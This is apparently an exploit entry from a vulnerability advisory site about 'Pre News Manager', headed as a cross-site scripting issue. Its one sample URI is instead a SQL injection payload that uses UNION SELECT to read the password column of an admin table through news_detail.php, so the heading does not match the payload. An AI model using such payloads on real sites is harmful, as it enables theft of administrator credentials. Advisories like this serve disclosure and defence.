• info
• discussion
• exploit
• solution
• references

Pre News Manager Multiple Cross-Site Scripting Vulnerabilities

Attackers can use a browser to exploit this issue.

A sample URI has been provided:

http://www.example.com/news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*